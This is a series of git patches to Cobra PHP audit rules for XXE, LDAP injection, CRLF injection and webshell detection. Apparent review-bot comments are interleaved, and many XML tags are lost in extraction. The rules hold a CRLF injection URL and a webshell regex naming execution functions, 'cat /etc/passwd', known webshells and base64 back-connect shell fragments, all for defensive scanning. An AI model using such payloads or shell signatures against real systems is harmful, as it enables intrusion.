From 70369c5b38ed8f0af463ac8a9ea1747b404f2fe4 Mon Sep 17 00:00:00 2001 From: braveghz Date: Wed, 30 Aug 2017 10:09:06 +0800 Subject: [PATCH 01/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-270001?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-270001.xml | 26 +++++++++++++------------- 1 file changed, 13 insertions(+), 13 deletions(-) diff --git a/rules/CVI-270001.xml b/rules/CVI-270001.xml index 3803a25b..134d686d 100644 --- a/rules/CVI-270001.xml +++ b/rules/CVI-270001.xml @@ -7,17 +7,17 @@ + ]]> + ]]> @@ -32,12 +32,12 @@ 敏感信息泄露 探测内网,获取服务器权限 进行拒绝服务攻击,影响正常业务 - 敏感数据被盗取。 - 造成服务宕机。 + 敏感数据被盗取 + 造成服务宕机 ## 修复方案 1. 使用 `libxml_disable_entity_loader(true);` - 2. 过滤用户提交的XML数据,关键词:` - + From 819dbe6099fec2d15b8215b0f7ca92bf6d5332b9 Mon Sep 17 00:00:00 2001 From: braveghz Date: Wed, 30 Aug 2017 10:21:19 +0800 Subject: [PATCH 02/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-250001=20LDAP?= =?UTF-8?q?=E6=B3=A8=E5=85=A5?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-250001.xml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/CVI-250001.xml diff --git a/rules/CVI-250001.xml b/rules/CVI-250001.xml new file mode 100644 index 00000000..73530215 --- /dev/null +++ b/rules/CVI-250001.xml @@ -0,0 +1,24 @@ + + + + + + + + + + + ## 安全风险 + + LDAP Injection + 允许进行LDAP查询 + 输入未进行过滤 ---> LDAP注入 + 这种威胁可以让攻击者能够从LADP树中提取到很多很重要的信息 + + ## 修复方案 + 对用户输入数据中包含的”语言本身的保留字符”进行转义 + + + + + + From f270b7af8fe6d217965f0c93475320b33bf8fc81 Mon Sep 17 00:00:00 2001 From: braveghz Date: Wed, 30 Aug 2017 11:26:36 +0800 Subject: [PATCH 03/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-220001=20HRS?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-220001.xml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/rules/CVI-220001.xml b/rules/CVI-220001.xml index 3a7567fc..863f50c5 100644 
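Review bot: The rewritten 修复方案 in the @@ -32 hunk leaves `libxml_disable_entity_loader(true);` as the only remediation, but that function is deprecated since PHP 8.0 and only affects the default external-entity loader, so the advice ages badly. The durable guidance is to never pass `LIBXML_NOENT` or `LIBXML_DTDLOAD` to `simplexml_load_string()` / `DOMDocument::loadXML()` on untrusted input and to reject documents carrying a DOCTYPE; a second line such as `2. Do not pass LIBXML_NOENT or LIBXML_DTDLOAD when parsing untrusted XML` would keep the text valid on current PHP. The @@ -7 hunk and the removed keyword-filter line lost their content in this extraction, so the new `<match>` pattern itself is not reviewable from this page.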
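Review bot: The 修复方案 of the new CVI-250001 rule says to escape the language's reserved characters but names neither the characters nor the PHP API, so a reader of the finding cannot act on it; `ldap_escape($value, '', LDAP_ESCAPE_FILTER)` for filter values and `LDAP_ESCAPE_DN` for DN components is the concrete fix and belongs in the solution text. The 安全风险 paragraph also misspells `LADP` for `LDAP`. The `<match>` pattern and `<test>` cases of this file did not survive extraction here, so the detection logic is not reviewable from this page.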
--- a/rules/CVI-220001.xml +++ b/rules/CVI-220001.xml @@ -1,24 +1,32 @@ - - + + + + ## 安全风险 - `` - `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d` + CRLF是"回车+换行"(\r\n)的简称。在HTTP协议中,HTTP Header与HTTP Body是用两个CRLF分隔的,浏览器根据这两个CRLF来取出HTTP内容并显示出来。 + 所以,一旦能够控制HTTP消息头中的字符,注入一些恶意的换行,就能注入一些会话Cookie或者HTML代码,所以CRLF Injection又叫HTTP Response Splitting. + CRLF Injection (CRLF注入) / HTTP Response Splitting(HRS) ## 修复方案 使用白名单判断 + + ## 代码示例 + + `` 构造 + `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d`发生注入 + + 修复方法:设置白名单,限制输入的URL ```php ``` - - - + \ No newline at end of file From 75820aa8e4f442bd7022881975f96f5332f06773 Mon Sep 17 00:00:00 2001 From: braveghz Date: Thu, 31 Aug 2017 10:28:09 +0800 Subject: [PATCH 04/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-360001=20webshell?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 58 ++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 58 insertions(+) create mode 100644 rules/CVI-360001.xml diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml new file mode 100644 index 00000000..193812a1 --- /dev/null +++ b/rules/CVI-360001.xml 
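Review bot: The new 代码示例 presents `/index.php?url=a%0a%0dContent-Type:%20text/html%0a%0d%0a%0d` as splitting the response, but PHP has rejected header values containing CR/LF in `header()` since 5.1.2, so if the (stripped) sample's sink is `header()` the example does not reproduce on any supported PHP and should state the context in which it does or name the sink that is actually affected. The 修复方案 `使用白名单判断` is sound but incomplete on its own; the text should also say to reject or strip `\r` and `\n` from anything copied into a header and to `urlencode()` values placed in a Location header. The rewritten file is also written without a trailing newline (`\ No newline at end of file`).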
@@ -0,0 +1,58 @@ + + + + + )\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| + (\\$\s*(\w+)\s*=[\\s\\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\\s\\S]{0,200}(?)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[\\s\"/*]*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(\"]*\\$\s*\\1)))| + ((preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\7['\"]*|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\\s\\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\\\'[^']*')\\w{0,5}e\\w{0,5}['\"])[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\([/*\\s]*\\$\s*\\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| + (\\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\10|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\\$\\1))| + ((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\s*\\(+\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\\)]{0,250},[^;\\),]{0,50}\\$[^;\\),]{0,50}\\))))| + 
(\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\\s\\S]{0,200}(?)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\b\s*\\(+\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1))[^,;]*,[^;\\)]{0,50}\\$[^;\\)]{0,50}\\))| + (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\\))| + (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\\\x|[^,;]*?['\"]\s*\\.\s*['\"]))[\\s\\S]{0,1000}(?)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+[^,]*\\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\\$\s*\\1\s*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| + (\\$(\w*)\s*=\s*\bcreate_function\b\s*\\(+\s*[^;\n\r\\)]{1,100},\s*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\\)]{0,100}file_get_contents.{1,})\s*\\)[\\s\\S]+\\$\\1\s*\\([^\\)]*\\))| + 
(\\$(\w*)\s*=\s*\bcreate_function\b\s*\\([^;]*;[\\s\\S]*\\$\\1\s*\\([^\\)]*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\\)]{0,100}file_get_contents.{1,}))| + (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\\s\\S]{0,200}create_function\s*\\(+[^,]{1,100},['\"\\s]*(\\$\s*\\1['\"\\s]*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}(?\\s])\s*\\$\\1\s*\\(+[^\\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| + (sqlite_create_function\s*\\([\\s\\S]{0,200}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)[\\s\\S]{0,200}sqlite_create_function\s*\\()| + (\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}\b(filter_var|filter_var_array)\b\s*\\(.*FILTER_CALLBACK[^;]*\\$\\1)| + (\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*(['\"][^,\"'\\)]*e[^,\"'\\)]*['\"]|.*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}).*|chr\s*\\(\s*101|chr\s*\\(\s*0x65|chr\s*\\(\s*0145)\s*\\))| + 
(\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{3,25})|['\"][^;]*e|[^;]*chr[\\s\\(]*(101|0x65|0145))[\\s\\S]{0,200}\b(mb_ereg_replace|mb_eregi_replace)\b\s*\\((.*,){3}\s*\\$\\1)| + (array_walk(_recursive)?\s*\\([^;,]*,\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace)\s*['\"]|(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})))| + (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|preg_replace))[\\s\\S]{0,200}array_walk(_recursive)?\s*\\([^;,]*,\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|include)\b\s*\\(\s*(file_get_contents\s*\\(\s*)?['\"]php://input)| + (^(\\xff\\xd8|\\x89\\x50|GIF89a|GIF87a|BM|\\x00\\x00\\x01\\x00\\x01)[\\s\\S]*<\\?\s*php)| + (\\$(\\w)=\$[a-zA-Z]\\('',\$\\w\\);\$\\1\\(\\);)| + (\$(\w+)\s*=\s*str_replace\s*\\([\\s\\S]*\$(\w+)\s*=\s*\$(\w+)(([\\s\\S]{0,255})|(\s*\\(\\'\\',\s*(\$(\w+)\s*\\(\s*)+))\$\\1\s*\\([\\s\\S]{0,100};?\s*\$\\2\\(?\s*\\))| + (ob_start\s*\(+\s*(['\"]\s*(eval|assert|ass\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{0,20}|['\"]\s*\w+[\s\S]{1,50}phpinfo\s*\(\s*\)))| + (\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b\s*\\(((\$_SERVER|\$_ENV|getenv|\$GLOBALS)\s*[\[\(]\s*['\"]+(REQUEST_URI|QUERY_STRING|HTTP_[\w_]+|REMOTE_[\w_])['\"\s]+\s*[\]\)]|php://input|exif_read_data\s*\())| + (eval\(\"\\?>\"\.|gzinflate\(base64_decode\(|eval\(base64_decode\(|cat\s*/etc/passwd|Safe_Mode\s*Bypass)| + (\$_\[\$_|\${\"_P\"\.|a(.)s\1s\1e\1r\1t|'e'\.'v'\.'a'\.'l|687474703a2f2f626c616b696e2e64756170702e636f6d2f7631|python_eval\(\"import os\\\nos.system\(|\$bind_pl\s*=\s*\"IyEvdXNyL2Jpbi9lbnYgcGV|phpsocks5_encrypt\s*\(|eNrs/Vmv41iWJgq+ZwH1H7wdAWRksypJihRF3kQ0mvMsihTnuoUA53meeVG/valj5mbuHpF9b6P7se)| + 
(preg_replace\s*\\(\s*['\"][^;]*e[^;]*['\"],([^;]{0,30}\\\\x|[^;\)]{200,300})|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU2|define\('gzip',function_exists\(\"ob_gzhandler\"\)|chr\(112\)\.chr\(97\)\.chr\(115\)\.chr\(115\)|687474703a2f2f377368656c)| + (ini_get\s*\(\s*\"disable_functions\"\s*\\)|\\d\s*=>\s*array\s*\\(\s*['\"]\s*pipe\s*['\"]|gzuncompress\\(base64_decode\\(|crypt\\(\$_SERVER\['HTTP_H0ST'\\],\\d+\\)==|if\\(file_exists\\(\$settings\['STOPFILE'\\]\\)\\))| + (\$nofuncs='no\s*exec\s*functions|udf\\.dll|\$b374k|POWER-BY\s*WWW.XXDDOS.COM|Safes\s*Mode\s*Shell|Siyanur\\.PHP\s*|c999shexit\\(\\)|\$c99sh_|c99_sess_put\\(|Coded\s*by\s*cyb3r|cyb3r_getupdate\\(|coded\s*by\s*tjomi4|john\\.barker446@gmail\\.com|eval\\(\"\\\\\$x=gzin\"|eval\\(\"\\?>\"\\.gzinflate\\(base64_decode\\(|eval\\(gzinflate\\(base64_decode\\(|eval\\(gzuncompress\\(base64_decode\\(|eval\\(gzinflate\\(str_rot13\\(base64_decode\\(|function_exists\\(\"zigetwar_buff_prepare\"\\)|dQ99shell|r57shell|c99shell|lama's'hell\s*v|Carbylamine\s*PHP\s*Encoder|Safe\s*Mode\s*Shell|\$dI3h=\${'_REQUEST'};|new\s*COM\\(\"IIS://localhost/w3svc\"\\)|n57http-based\[\s*-\\]terminal|Dosya\s*Olu|errorlog\\(\"BACKEND:\s*startReDuh,|form\s*name=sh311Form|PHPJackal
|Reddragonfly's\s*WebShell|\\(\"system\"==\$seletefunc\\)\\?system\\(\$shellcmd\\)|eNrsvGmT40iSKPZ5xmz|CrystalShell\s*v\\.|Special\s*99\s*Shell|Simple\s*PHP\s*Mysql\s*client|'_de'\\.'code'|phpsocks5_encrypt\\(|define\\('PHPSHELL_VERSION',|ZXZhbCgkX1BPU1RbMV0p|\$__H_H\\(\$__C_C)| + (PD9waHANCiRzX3ZlciA9ICIxLjAiOw0KJHNfdGl0bGUgPSAiWG5vbnltb3V4IFNoZWxsIC|GFnyF4lgiGXW2N7BNyL5EEyQA42LdZtao2S9f|IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7|setcookie\\(\"N3tsh_surl\"\\);|function\s*Tihuan_Auto|\$_COOKIE\['b374k'\\]|function_exists\\(\"k1r4_sess_put\"\\)|http://www.7jyewu.cn/|scookie\\('phpspypass|PHVayv.php\\?duzkaydet=|phpRemoteView|define\\('envlpass',|KingDefacer_getupdate\\(|relative2absolute\\(|Host:\s*old.zone-h.org|

PHPKonsole

|\$_SESSION\['hassubdirs'\\]\[\$treeroot\\]|strtolower\\(\$cmd\\)\s*==\s*\"canirun\"|\$shell\s*=\s*'uname\s*-a;\s*w;\s*id;|Avrasya\s*Veri\s*ve\s*NetWork|

Linux Shells

|\$MyShellVersion\s*=\s*\"MyShell|PHP\s*Shell\s*[^\n\r]*|\$OOO000000=urldecode|1MSSYowqjzlVVAwAoHHFXzQ5Lc|'xiaoqiwangluo'|EqQC1FhyXxpEi7l2g\\+yNjW62S|\$_uU\\(83\\)\\.\$_uU\\(84\\)|7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8|\s*ARS\s*Terminator\s*Shell|base64_decode\\(\"R0lGODdhEgASAKEAAO7u7gAAAJmZmQAAACwAAA|\\\\x50\\\\x4b\\\\x03\\\\x04\\\\x0a\\\\x00\\\\x00\\\\x00\\\\x00|'W3D\s*Shell|\$back_connect=\"IyEvdXNyL2Jpbi9wZXJsD)| + (\$(\w+)[\\s]*\\=[\\s]*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(?:\\1\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\s*\\)|(\w+)\s*\\=\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}[\\s\\S]*(?<!\\>)\$(\\1\\(\s*\$\\2|\\2\\(\s*\$\\1)\s*\\)|_(?:POST|GET|REQUEST|COOKIE|SERVER).{0,25}\\(\s*\$\\1\s*\\))|\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\\(\s*\$_(?:POST|GET|REQUEST|COOKIE|SERVER)\[(['\"]\w+['\"]|\\d+)\\]\s*\\)) + + + + ]]></match> + <level value="7"/> + <solution> + ## 安全风险 + + ## 修复方案 + </solution> + <test> + <case assert="true"><![CDATA[ + ]]></case> + <case assert="false"><![CDATA[ + ]]></case> + </test> + <status value="on"/> + <author name="Feei" email="feei@feei.cn"/> +</cobra> \ No newline at end of file From ba70867ae7c11606a49418afb8ce83d248ea9602 Mon Sep 17 00:00:00 2001 From: braveghz <braveghz@gmail.com> Date: Thu, 31 Aug 2017 10:49:22 +0800 Subject: [PATCH 05/29] =?UTF-8?q?=E4=BF=AE=E6=94=B9CVI-170002=20PHP=20LFI/?= =?UTF-8?q?RFI?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- rules/CVI-360001.xml | 68 +++++++++++++++++++++----------------------- 1 file changed, 33 insertions(+), 35 deletions(-) diff --git a/rules/CVI-360001.xml b/rules/CVI-360001.xml index 193812a1..19aa4b10 100644 --- a/rules/CVI-360001.xml +++ b/rules/CVI-360001.xml 
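Review bot: The two create_function alternatives spell `poc_open` where every other dangerous-function list in the pattern says `proc_open` (`passthru|popen|poc_open|pcntl_exec`), so a `proc_open` call wrapped in `create_function` is silently missed; change both occurrences to `passthru|popen|proc_open|pcntl_exec`. The same typo survives the rewrite in PATCH 05 (the hunk ending at the second `<level value="7"/>`). The rule also ships with empty documentation and tests: `<solution>` holds only the bare `## 安全风险` / `## 修复方案` headings and both `<case>` elements contain empty CDATA, so at least one true case exercising a branch and one false case with a benign call should be added before `<status value="on"/>` enables it. The pattern additionally mixes double-escaped (`\\s`, `\\(`) and single-escaped forms, which PATCH 05 only partly normalises.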
@@ -3,42 +3,40 @@ <name value="WebShell"/> <language value="php"/> <match mode="regex-only-match"><![CDATA[ - ([\r\\n;/\\*]+ \s*\b(include|require)(_once)?\b[\\s\\(]*['\"][^\\n'\"]{1,100}((\\.(jpg|png|txt|jpeg|log|tmp|db|cache)|\\_(tmp|log))|((http|https|file|php|data|ftp)\\://.{0,25}))['\"][\\s\\)]*[\r\n;/\\*]+)| - ((?<!->)\bassert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*(\$_(GET|POST|REQUEST|COOKIE).{0,25})))| - (\\$\s*(\w+)\s*=[\\s\\(\]*(\$_(GET|POST|REQUEST|COOKIE).{0,25});[\\s\\S]{0,200}(?<!\\>)\b(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\b[/*\\s]*\\(+[\\s\"/*]*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(\"]*\\$\s*\\1)))| - ((preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\7['\"]*|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\),]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|((\$_(GET|POST|REQUEST|COOKIE).{0,25}))))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^;]*chr[\\s\\(]*(101|0x65|0145|\\d+)|['\"](/[^/]*/|\\|[^\\|]*\\||\\\\'[^']*')\\w{0,5}e\\w{0,5}['\"])[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\([/*\\s]*\\$\s*\\1.{0,30}(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))| - (\\$\s*(\w+)\s*=\s*(\$_(GET|POST|REQUEST|COOKIE).{0,25})[\\s\\S]{0,1000}(preg_replace|preg_filter)[/*\\s]*\\(+[/*\\s]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|[^,]{0,250}chr[\\s\\(](101|0x65|0145|\\d+)[^,]{0,25}\s*|['\"]\s*(([^\\s])[^,]{0,20}\\10|[\\(\\}\[].{0,20}[\\(\\}\\]])\w*e\w*['\"])\s*,([^\\)]*(assert|eval|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)|\s*\\$\\1))| - 
((array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\s*\\(+\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^'\"]*\\\\x).{0,200}|(\$_(GET|POST|REQUEST|COOKIE)\[[^,;\\)]{0,250},[^;\\),]{0,50}\\$[^;\\),]{0,50}\\))))| - (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec))[\\s\\S]{0,200}(?<!\\>)\b(array_map|call_user_func|call_user_func_array|new\s*ReflectionFunction|register_shutdown_function|register_tick_function|new\s*ArrayObject[\\s\\S]*->u[ak]sort)\b\s*\\(+\s*(\\$\s*\\1|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1))[^,;]*,[^;\\)]{0,50}\\$[^;\\)]{0,50}\\))| - (((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+\s*.{1,100}|PDO::FETCH_FUNC\s*),\s*(['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]+.{1,25}|(\$_(GET|POST|REQUEST|COOKIE).{0,25}))\s*\\))| - (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec|[^,;]*?\\\\x|[^,;]*?['\"]\s*\\.\s*['\"]))[\\s\\S]{0,1000}(?<!\\>)((array_filter|array_reduce|array_diff_ukey|array_udiff|array_walk|uasort|uksort|usort|new\s*SQLite3[\\s\\S]*->\s*createFunction)\s*\\(+[^,]*\\$[^,]*|PDO::FETCH_FUNC\s*),\s*(\\$\s*\\1\s*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| - 
(\\$(\w*)\s*=\s*\bcreate_function\b\s*\\(+\s*[^;\n\r\\)]{1,100},\s*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^,]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^,\n\r\\)]{0,100}file_get_contents.{1,})\s*\\)[\\s\\S]+\\$\\1\s*\\([^\\)]*\\))| - (\\$(\w*)\s*=\s*\bcreate_function\b\s*\\([^;]*;[\\s\\S]*\\$\\1\s*\\([^\\)]*(['\"]\s*[^;\n\r\\)]{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|poc_open|pcntl_exec).{1,600}\s*['\"]|[^;\n\r]{0,100}(\$_(GET|POST|REQUEST|COOKIE|SERVER).{1,})|[^;\n\r\\)]{0,100}file_get_contents.{1,}))| - (\\$\s*(\w+)\s*=[\\s\\(\{]*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*.{0,100}(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec).{1,100}\s*['\"]|file_get_contents)[\\s\\S]{0,200}create_function\s*\\(+[^,]{1,100},['\"\\s]*(\\$\s*\\1['\"\\s]*\\)|((base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)[\\s\\(]*\\$\s*\\1)))| - (\\$\s*(\w+)\s*=\s*((\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25})|['\"]\s*(eval|assert|ass\\\\x65rt|system|exec|shell_exec|passthru|popen|proc_open|pcntl_exec)\s*['\"]|(base64_decode|gzinflate|gzuncompress|gzdecode|str_rot13)\s*\\()[\\s\\S]{0,200}(?<![:>\\s])\s*\\$\\1\s*\\(+[^\\)]*(\$_(GET|POST|REQUEST|COOKIE|SERVER).{0,25}))| - 